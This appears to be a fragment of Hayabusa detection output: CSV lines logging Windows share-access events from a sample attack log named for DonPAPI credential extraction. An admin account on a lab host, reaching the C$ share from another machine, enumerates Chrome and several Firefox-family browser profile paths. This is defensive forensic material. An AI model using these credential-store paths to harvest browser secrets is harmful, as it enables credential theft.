+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
